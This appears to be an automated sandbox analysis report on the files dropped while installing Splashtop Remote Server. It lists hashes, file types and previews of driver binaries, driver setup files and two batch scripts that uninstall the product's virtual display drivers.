                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):805
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.339948574341861
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:V8pgfeV4BZAK/1AN6gizSnOf6DE6Z9wmhKRvVLymhMm0KuKDLGuKw61IfQHyoHHO:VSIBBY6t5UbhKRvV7e6LpIJHT5C
                                                                                                                                                                                                                                                                                                                                  MD5:704D1CC8E0B87710278CE3EFD1C17954
                                                                                                                                                                                                                                                                                                                                  SHA1:EDF2D7FED5D3D88A657732B37C72E4CDEE90D12D
                                                                                                                                                                                                                                                                                                                                  SHA-256:FAB1408C7DE4B76FA3AF7AD4C9F25DF2063C591CDFC46445999D31B4DB712208
                                                                                                                                                                                                                                                                                                                                  SHA-512:6061B9BB1A4D55FD916A44C8619356DC4ED40C284F91FC2114CD5974533F762F88B4E0C49A265E96AD1E122ACFBA947D02AA3B11E43115D247FA0868661BDC3B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off..SETLOCAL..%~d0..cd %~dp0....reg delete "HKLM\SOFTWARE\Splashtop Inc.\Splashtop Remote Server" /v "VirtualDisplay" /f....REM..REM detect the OS version..REM..for /f "tokens=4-7 delims=[.] " %%i in ('ver') do (if %%i==Version (set v=%%j) else (set v=%%i))..if %v% GEQ 10 (.. cd win10..) else (.. cd win7..)..set DEVCMD=rundll32 x86\my_setup.dll....echo removing LCI PROXY WDDM Device.......%DEVCMD% do_uninstall_lci_proxykmd..%DEVCMD% do_uninstall_lci_proxywddm....timeout /t 1 /nobreak..sc.exe delete lci_proxykmd..sc.exe delete lci_proxywddm....timeout /t 2 /nobreak..del %SystemRoot%\System32\lci_proxyumd.dll..del %SystemRoot%\System32\drivers\lci_proxykmd.sys..del %SystemRoot%\System32\drivers\lci_proxywddm.sys..del %SystemRoot%\System32\drivers\UMDF\lci_iddcx.dll....:exit..ENDLOCAL

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\uninstall_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):817
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.35613829912293
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:V8pgMyeV4BZAK/1AN6gizSnOf6DE6Z9wmhKdWiVLymhMm0KuKDLGuKw61IfQHyoO:VS3sBBY6t5UbhKdvV7e6LpIJHT5C
                                                                                                                                                                                                                                                                                                                                  MD5:319DCF0B017DAFA51C33A7489D123F91
                                                                                                                                                                                                                                                                                                                                  SHA1:60F8E32A2E7E05F2384D8B66E51F8FF1DE70AC10
                                                                                                                                                                                                                                                                                                                                  SHA-256:44A271D1DD10FFC85815DF277E708BE462CC5AFABC43BD0D7A9505E35A70E488
                                                                                                                                                                                                                                                                                                                                  SHA-512:EE6403E7069C1185F6F34A02DA2DE1FEC2F859E89523B769CF9EFDCAA2CD9E5AFA501ADC38169A86D86DA1570C789116A29C2485F87201CFD2A770EC447A55C3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off..SETLOCAL..%~d0..cd %~dp0....reg delete "HKLM\SOFTWARE\Wow6432Node\Splashtop Inc.\Splashtop Remote Server" /v "VirtualDisplay" /f....REM..REM detect the OS version..REM..for /f "tokens=4-7 delims=[.] " %%i in ('ver') do (if %%i==Version (set v=%%j) else (set v=%%i))..if %v% GEQ 10 (.. cd win10..) else (.. cd win7..)..set DEVCMD=rundll32 x64\my_setup.dll....echo removing LCI PROXY WDDM Device.......%DEVCMD% do_uninstall_lci_proxykmd..%DEVCMD% do_uninstall_lci_proxywddm....timeout /t 1 /nobreak..sc.exe delete lci_proxykmd..sc.exe delete lci_proxywddm....timeout /t 2 /nobreak..del %SystemRoot%\System32\lci_proxyumd.dll..del %SystemRoot%\System32\drivers\lci_proxykmd.sys..del %SystemRoot%\System32\drivers\lci_proxywddm.sys..del %SystemRoot%\System32\drivers\UMDF\lci_iddcx.dll....:exit..ENDLOCAL

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\utils\devcon.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):85216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.323561566613011
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:34rhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkApiKB:K+KY04RMmSCYmBiF4O7WTgKB
                                                                                                                                                                                                                                                                                                                                  MD5:CD483270630CCABBD1902C6B21FBE9D3
                                                                                                                                                                                                                                                                                                                                  SHA1:B33C3139DD83F108591383449D4F9136189D8F97
                                                                                                                                                                                                                                                                                                                                  SHA-256:49D6B913A4095A3E7B14554C91942BD5CDDDF9DCFDB076B31921592AFF1BC135
                                                                                                                                                                                                                                                                                                                                  SHA-512:DC92ED176DBB7CC27BE1FFF90F875B2582869465156BD70F363902524C716822FB9657AA944A6F02CB1E77271F3D24F8667F4A678F5BB5B5846AB18E455A731F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."..."....."......"......"...#.S."....."..`\..."......"......".Rich..".................PE..L...#.pK.................l..........Td.......................................P......F.....@...... ..........................lm..........p............0.......@...... ...............................0...@............................................text... j.......l.................. ..`.data...4............p..............@....rsrc...p............v..............@..@.reloc.......@.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\utils\devcon64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):89312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.29323585141242
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:UP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7WsK6:UePOYe4bu1epDh8RWsK6
                                                                                                                                                                                                                                                                                                                                  MD5:07361279885BC0B334DDF5754CDB12FE
                                                                                                                                                                                                                                                                                                                                  SHA1:63A7320CD6992E2509EB1D82D550B1AA5FEA6A47
                                                                                                                                                                                                                                                                                                                                  SHA-256:96411A783BAA574421659E73B11F111A0EEB3D9B105CA55E29FE6C0B820646F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:D07F5DFFEAD4470CAA935F6CD250DF9CA77A2D28C0B84112D83CE9ED7AC7A01CB012773FB290612E4DE45776BB919C395533AD3AD5497A3469BFE5B43FB5D1E8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9...AF..9...AW..9...A@..9...9..f9...AP.9...AY..9.......9...AG..9...AB..9..Rich.9..........................PE..d.....pK.........."......~...........s.......................................p......Mz....@.......... ......................................X}..........p.......T....@.......`......0................................................................................text....|.......~.................. ..`.data...x...........................@....pdata..T...........................@..@.rsrc...p...........................@..@.reloc..p....`.......>..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\lci_iddcx.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10957
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.22853921730831
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:0gNqq6a1DUuvE7EwWZhYC/nnbXfH098uXqnajH/svHa:0gEy9Zh3/njXuXlTsPa
                                                                                                                                                                                                                                                                                                                                  MD5:62458E58313475C9A3642A392363E359
                                                                                                                                                                                                                                                                                                                                  SHA1:E63A3866F20E8C057933BA75D940E5FD2BF62BC6
                                                                                                                                                                                                                                                                                                                                  SHA-256:85620D87874F27D1AAF1743C0CA47E210C51D9AFD0C9381FC0CD8ACCA3854562
                                                                                                                                                                                                                                                                                                                                  SHA-512:49FB8CA58AECF97A6AB6B97DE7D367ACCB7C5BE76FBCD324AF4CE75EFE96642E8C488F273C0363250F7A5BCEA7F7055242D28FD4B1F130B68A1A5D9A078E7FAD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.*...*.H........*.0.*....1.0...`.H.e......0..=..+.....7......0..*0...+.....7......?~..S.N.j....J...181204081131Z0...+.....7.....0...0......e.Q.82....jG.8....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0>..+.....7...100....F.i.l.e........l.c.i._.i.d.d.c.x...i.n.f...0.... _...U...woq..2..:.V.kx........1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0>..+.....7...100....F.i.l.e........l.c.i._.i.d.d.c.x...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... _...U...woq..2..:.V.kx........0.... `...m..d..E.f|.R.o../.ziR&7.._..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0>..+.....7...100....F.i.l.e........l.c.i._.i.d.d.c.x...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... `...m..d..E.f|.R.o../.ziR&7.._..0....d}...))...3e...u...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0>..+.....7...100....F.i.l.e........l.c.i._.i.d.d.c.x...d.l.l...0..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\lci_iddcx.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4514
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7887986776100973
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:9G2XN/WAXHQ+C2C4kqWDZXpbdl5Vjnijla4UAiI6fOgTiYqG585wg3Jp:9L5EDNRniWI6fyw5I
                                                                                                                                                                                                                                                                                                                                  MD5:1CEC22CA85E1B5A8615774FCA59A420B
                                                                                                                                                                                                                                                                                                                                  SHA1:049A651751EF38321A1088AF6A47C4380F9293FC
                                                                                                                                                                                                                                                                                                                                  SHA-256:60A018F46D17B7640FC34587667CD852A16FA8E82F957A69522637F22E5FE5CF
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F24FE3914AEF080A0D109DF6CFAC548A880947FB85E7490F0D8FA174A606730B29DC8D2AE10525DBA4D1CA05AC9B190E4704629B86AC96867188DF4CA3168BB
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..;.....;.M.o.d.u.l.e. .N.a.m.e.:.....;. . . . .l.c.i._.i.d.d.c.x...i.n.f.....;.....;.A.b.s.t.r.a.c.t.:.....;. . . . .I.N.F. .f.i.l.e. .f.o.r. .i.n.s.t.a.l.l.i.n.g. .t.h.e. .L.C.I. .I.D.D.C.X. .D.r.i.v.e.r.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e.=.".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s.G.U.I.D. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r.=.%.L.C.I.%.....C.a.t.a.l.o.g.F.i.l.e.=.l.c.i._.i.d.d.c.x...c.a.t.....D.r.i.v.e.r.V.e.r.=.1.2./.0.4./.2.0.1.8.,.1...0...2.0.1.8...1.2.0.4.........[.D.e.s.t.i.n.a.t.i.o.n.D.i.r.s.].....D.e.f.a.u.l.t.D.e.s.t.D.i.r. .=. .1.2.....U.M.D.r.i.v.e.r.C.o.p.y.=.1.2.,.U.M.D.F. .;. .c.o.p.y. .t.o. .d.r.i.v.e.r.s.\.u.m.d.f.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s...x.8.6.].....1.=.%.D.I.S.K._.N.A.M.E.%.,.,.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s...a.m.d.6.4.].....1.=.%.D.I.S.K._.N.A.M.E.%.,.,.........[.S.o.u.r.c.e.D.i.s.k.s.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\lci_proxywddm.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12585
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.124479508046628
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:M9yLPtUtkB7uIqhmbgE7EwWZhYCyZR/HsgKqnajVhY2c8evGd:gZO49Zh3e1MgKlxW2c8eed
                                                                                                                                                                                                                                                                                                                                  MD5:8E16D54F986DBE98812FD5EC04D434E8
                                                                                                                                                                                                                                                                                                                                  SHA1:8BF49FA8E12F801559CC2869365F0B184D7F93FE
                                                                                                                                                                                                                                                                                                                                  SHA-256:7C772FB24326E90D6E9C60A08495F32F7D5DEF1C52037D78CBD0436AD70549CD
                                                                                                                                                                                                                                                                                                                                  SHA-512:E1DA797044663AD6362641189FA78116CC4B8E611F9D33C89D6C562F981D5913920ACB12A4F7EF6C1871490563470E583910045378BDA5C7A13DB25F987E9029
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.1%..*.H........1.0.1....1.0...`.H.e......0.....+.....7......0...0...+.....7.....tW...d#O...L<":4..181204083207Z0...+.....7.....0...0....!,..8.'T......\.b.\s1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0F..+.....7...1806...F.i.l.e.......$l.c.i._.p.r.o.x.y.w.d.d.m...s.y.s...0....;~.Y&h.L..@.ds. .A..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0D..+.....7...1604...F.i.l.e......."l.c.i._.p.r.o.x.y.u.m.d...d.l.l...0.... \...s .p.mI^1:.M5KEO4..?l......1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0D..+.....7...1604...F.i.l.e......."l.c.i._.p.r.o.x.y.u.m.d...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... \...s .p.mI^1:.M5KEO4..?l......0.... \...s .p.mI^1:.M5KEO4..?l......1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0H..+.....7...1:08...F.i.l.e.......&l.c.i._.p.r.o.x.y.u.m.d.3.2...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\lci_proxywddm.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2715
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.41680725095282
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:qnchtOKbzLbS10bzPbSvb/mwwophwwoJOxWqrz61/zA9cjiJIjgW5FH1519HS4Bc:Pkua1YuSnEhn/A7ic4d4y
                                                                                                                                                                                                                                                                                                                                  MD5:0315A579F5AFE989154CB7C6A6376B05
                                                                                                                                                                                                                                                                                                                                  SHA1:E352FF670358CF71E0194918DFE47981E9CCBB88
                                                                                                                                                                                                                                                                                                                                  SHA-256:D10FA136D6AE9A15216202E4DD9F787B3A148213569E438DA3BF82B618D8001D
                                                                                                                                                                                                                                                                                                                                  SHA-512:C7CE8278BC5EE8F8B4738EF8BB2C0A96398B40DC65EEA1C28688E772AE0F873624311146F4F4EC8971C91DF57983D2D8CDBEC1FE98EAA7F9D15A2C159D80E0AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:;..;..;Module Name:..;..; lci_proxywddm.inf..;..;Abstract:..; LuminonCore Display Proxy Driver..;..;..[Version]..Signature="$WINDOWS NT$"..Class=System..ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}..Provider=%LCI%..DriverVer=12/04/2018,1.0.2018.1204..CatalogFile=lci_proxywddm.cat....[DestinationDirs]..DefaultDestDir = 12..lci_proxywddm.CopyFiles = 12 ; drivers..lci_proxyumd.CopyFiles = 11 ; system32..lci_proxyumdwow.CopyFiles = 10, SysWow64 ; x64-specific....[SourceDisksNames.x86]..1=%DiskId1%, lci_proxywddm.sys,,\x86..1=%DiskId1%, lci_proxyumd.dll,,\x86....[SourceDisksNames.amd64]..1=%DiskId1%, lci_proxywddm.sys,,\x64..1=%DiskId1%, lci_proxyumd.dll,,\x64..1=%DiskId1%, lci_proxyumd32.dll,,\x64....[SourceDisksFiles.x86]..lci_proxywddm.sys = 1..lci_proxyumd.dll = 1....[SourceDisksFiles.amd64]..lci_proxywddm.sys = 1..lci_proxyumd.dll = 1..lci_proxyumd32.dll = 1......;*****************************************

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_iddcx.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.555505359489877
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:q4+LP4B5MAHFQq4OSGtGkVPKLIy0uwc0yeuUjsVbGVjp3haxZ3vOoKn:q4+LS5XYOSk1Kky0uww6s5mN3haxZI
                                                                                                                                                                                                                                                                                                                                  MD5:01E8BC64139D6B74467330B11331858D
                                                                                                                                                                                                                                                                                                                                  SHA1:B6421A1D92A791B4D4548AB84F7140F4FC4EB829
                                                                                                                                                                                                                                                                                                                                  SHA-256:148359A84C637D05C20A58F5038D8B2C5390F99A5A229BE8ECCBB5F85E969438
                                                                                                                                                                                                                                                                                                                                  SHA-512:4099E8038D65D95D3F00FD32EBA012F55AE16D0DA3828E5D689EF32E20352FDFCC278CD6F78536DC7F28FB97D07185E654FE6EEE610822EA8D9E9D5AF696DFF5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........N.9./.j./.j./.j.q.k./.j.q.k./.j.q.k./.j.r.k./.j.WQj./.j.r.k./.j./.j./.j'.7j./.j'.3j./.j'.0j./.j.r.k./.j.q.k./.j.q.k./.j.q.k./.j.q=j./.j.q.k./.jRich./.j........................PE..d....%.\.........." .....X...@......@T....................................................`.........................................P...P................................?.......... ...8...........................`................p...............................text....V.......X.................. ..`.rdata...%...p...&...\..............@..@.data...0...........................@....pdata..............................@..@.gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxyumd.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):184016
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2322376663017
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:uSNRRE5JX6GkYj9i/hXJTqHDh3ibNrg4WhC8MFMbgGYgITUP4uvo4B:uS6Pb5KnT2dSNsC+gGx62v/
                                                                                                                                                                                                                                                                                                                                  MD5:4DC11547A5FC28CA8F6965FA21573481
                                                                                                                                                                                                                                                                                                                                  SHA1:D531B0D8D2F8D49D81A4C17FBAF3BC294845362C
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9DB5CD21C8D709A47FC0CFB2C6CA3BB76A3ED8218BED5DC37948B3F9C7BD99D
                                                                                                                                                                                                                                                                                                                                  SHA-512:BD0F0A3BBC598480A9B678AA1B35728B2380BF57B195B0249936D0EAAA014F219031A563F486871099BF1C78CCC758F6B25B97CFC5296A73FC60B6CAFF9877F6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Vj..7.R.7.R.7.R.j.S.7.R.j.S.7.R.i.S.7.R.i.S.7.R.i.S.7.R.j.S.7.R.7.R.7.R.j.S.7.RMi.S.7.RMi.S.7.RMi.S.7.RHi.R.7.RMi.S.7.RRich.7.R........PE..d....%.\.........." .....r...*............................................................`.........................................`M.......M..<................(.......@...........:..8...........................@:..................X............................text...`q.......r.................. ..`.rdata...............v..............@..@.data........`.......>..............@....pdata...(.......*...J..............@..@.gfids...............t..............@..@.rsrc................v..............@..@.reloc...............z..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxyumd32.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.622950914796068
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Pi+6wKkplcu1L3/xFxqFYOA555ZRlremv59jYqN:6+9cu1oF/AnqqN
                                                                                                                                                                                                                                                                                                                                  MD5:67AE7B2C36C9C70086B9D41B4515B0A8
                                                                                                                                                                                                                                                                                                                                  SHA1:BA735D6A338C8FDFA61C98F328B97BF3E8E48B8B
                                                                                                                                                                                                                                                                                                                                  SHA-256:79876F242B79269FE0FE3516F2BDB0A1922C86D820CE1DD98500B385511DAC69
                                                                                                                                                                                                                                                                                                                                  SHA-512:4D8320440F3472EE0E9BD489DA749A738370970DE07B0920B535642723C92DE848F4B3D7F898689C817145CE7B08F65128ABE91D816827AEB7E5E193D7027078
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v.X.v.X.v.X.+.Y.v.X.+.Y.v.X.(.Y.v.X.(.Y.v.X.(.Y.v.X.+.Y.v.X.v.X.v.X.+.Y.v.Xu(.Y.v.Xu(.Y.v.Xu(.Y.v.Xp(;X.v.Xu(.Y.v.XRich.v.X................PE..L....%.\...........!.....6..................P...............................0.......4....@.....................................<........................@..............8..............................@............P..$............................text....4.......6.................. ..`.rdata..Rw...P...x...:..............@..@.data...t...........................@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxywddm.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):122576
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.535740565012407
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:dfSVevFp3FKtVy8ka9N9UOUNFZWEw+1M4hyFi:BSYNpkUOUrgxeMlo
                                                                                                                                                                                                                                                                                                                                  MD5:B9B0E9B4D93B18B99ECE31A819D71D00
                                                                                                                                                                                                                                                                                                                                  SHA1:2BE1AD570F3CCB2E6F2E2B16D1E0002CA4EC8D9E
                                                                                                                                                                                                                                                                                                                                  SHA-256:0F1C64C0FA08FE45BEAC15DC675D3B956525B8F198E92E0CCAC21D2A70CE42CF
                                                                                                                                                                                                                                                                                                                                  SHA-512:465E389806F3B87A544AB8B0B7B49864FEEBA2EEEF4FB51628D40175573ED1BA00B26D6A2ABEBC74C31369194206ED31D32C68471DDDCF817FDD2D26E3DA7A53
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C^./.?.|.?.|.?.|jb.}.?.|.?.|d?.|jb.}.?.|jb.}.?.|jb.}.?.|.a.}x?.|.a7|.?.|.a.}.?.|Rich.?.|........PE..d....%.\.........."......N...N......,..........@................................................................................................(............@...........@......L.......8............................................................................text............................... ..h.rdata..l,..........................@..H.data........0......................@....pdata.......@......."..............@..H.gfids.......P.......2..............@..HPAGE.....R...`...T...4.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc..L...........................@..B........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\my_setup.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23528
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.370136009210867
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:6kV9C2/s2Abnkr+YcSIVO67k5hVAi59RKzOqUIUz8JN77hhM/l:vP0bE+YHIO67kLZVj83ha/l
